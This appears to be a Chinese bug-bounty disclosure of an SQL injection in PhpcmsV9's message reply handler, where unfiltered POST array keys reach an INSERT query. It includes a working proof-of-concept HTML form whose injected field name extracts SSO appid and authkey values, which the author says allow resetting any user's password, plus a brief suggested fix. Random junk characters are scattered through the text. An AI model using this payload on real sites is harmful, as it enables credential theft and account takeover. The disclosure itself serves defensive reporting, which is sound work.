PhpcmsV9 SQL注射修改任意用户密码漏洞

admin

简要描述：

4 K- i% O* q  j0 D第二发如约来到，感谢大家的关注，在第二发中使用了一个无限制的SQL注射，最终目的可以修改任意用户密码，建议确认安全危害等级为高。
2 f8 Y. ]% }5 o
明天再更新下一个漏洞。
详细说明：
+ Z6 l- C% C+ _9 x/ Y' c- Y在/phpcms9/phpcms/modules/message/index.php中有代码如下：
9 d% W* T. I, G) W8 p" C" s
$messageid = $this->message_db->insert($_POST['info'],true);
1 Q% Y. i! B6 _: f0 L

6 _/ Z; `. f$ m, _insert方法是key value的，代码如下：

public function insert($data, $table, $return_insert_id = false, $replace = false) {
                if(!is_array( $data ) || $table == '' || count($data) == 0) {
                        return false;
                }
               
2 k' d( E' @& e                $fielddata = array_keys($data);
                $valuedata = array_values($data);
& L9 I" Z6 r+ j" B) Z* }                array_walk($fielddata, array($this, 'add_special_char'));
                array_walk($valuedata, array($this, 'escape_string'));
               
, o& Y; Q8 q* M7 ^3 w+ i: p                $field = implode (',', $fielddata);
# l% g  e" T3 A5 A9 x% Q/ Z" s$ `                $value = implode (',', $valuedata);

                $cmd = $replace ? 'REPLACE INTO' : 'INSERT INTO';
                $sql = $cmd.' `'.$this->config['database'].'`.`'.$table.'`('.$field.') VALUES ('.$value.')';
! [& w" T! m+ K* y3 H0 B2 ]- S                $return = $this->execute($sql);
8 |2 ]/ r% ^' T8 b4 O                return $return_insert_id ? $this->insert_id() : $return;
* \1 |: Q: \" Y% z        }


嗯，很遗憾的是
- P/ ]3 S" ]" u7 |, o$ m% W
" P- |4 }8 Z; P$ s) g9 N' s- S3 A- warray_walk($fielddata, array($this, 'add_special_char'));

" a0 J# M: B5 _% g6 o* Q  }
% K7 Z$ H2 k4 a5 `中并没有对key做任何的过滤，所以，第一段提到的代码导致了一个SQL注射漏洞 ：（。

到此，为了poc一下，我读取了我本地的authkey，接下来我已经可以重置任意用户密码了，后面的事情我就没有演示了。

: m# f6 ~: ?* X9 O. l, {漏洞证明：
读出了phpsso_server的appid和authkey，然后可以调用client.class.php中的ps_member_edit函数修改任意用户密码。
  y- t5 ?$ D0 y8 [) F

& _1 v) s0 G" J% g, G% P表单如下：用户名什么的得自己改一改。
<form name="myform" action="http://localhost/phpcms9/index.php?m=message&c=index&a=reply" method="post" id="myform">
<table width="100%" cellspacing="0" class="table_form">
& }/ J7 M$ [: o! F8 H<tr>
<th>标 题：</th>
<td><input name="info[subject]" type="text" id="subject" size="30" value="Re: hh"  class="input-text"/></td>
# ]' j4 k0 m: q) l# X</tr>
, O0 v7 ~. K. _1 m" |6 i- X<tr>
<th>内 容：</th>
<td><textarea name="info[content]"  id="con" rows="5" cols="50"></textarea></td>
4 D% W3 P+ f/ S; Z: _5 o& R/ }& z7 n</tr>
* m+ r2 v: y! F- {5 H; t<input type="hidden" name="info[replyid]" value="2" />
, V6 _" b2 i) f0 @<input type="hidden" name="info[send_to_id]" value="cc" />
  V4 G" ~( D1 |# N; Z<input type="hidden" name="info[send_from_id]" value="hh">
<!-- 漏洞的利用重点在这里开始 -->
<input type="hidden" name="info[`status`) values ((Select group_concat(appid,CHAR(42),authkey) from v9_sso_applications),1,1,1,CHAR(104, 104),1)#]" value="cc" />
<!-- 漏洞的利用重点在这里结束 -->
<tr>
<th>验证码：</th>
<td><input name="code" type="text" id="code" size="10"  class="input-text"/> <img id='code_img' onclick='this.src=this.src+"&"+Math.random()' src='http://localhost/phpcms9/api.php?op=checkcode&code_len=4&font_size=14&width=110&height=30&font_color=&background='></td>
</tr>
<tr>
0 T0 B$ r' b2 `: b. A<td></td>
<td colspan="2"><label>
<input type="submit" name="dosubmit" id="dosubmit" value="确 定" class="button"/>
* |+ x6 y$ H" M% h) k( W</label></td>
</tr>
5 t+ I- u; O. e+ v! F2 X2 {+ T, h! S4 W</table>
</form>
在add_special_char函数内对key做过滤就可以了。
: X3 D- Z: A. }) Q# ~
! g& Q3 y: d" ^& R9 E( L, @* I# p
0 M9 R9 ^' a& n' R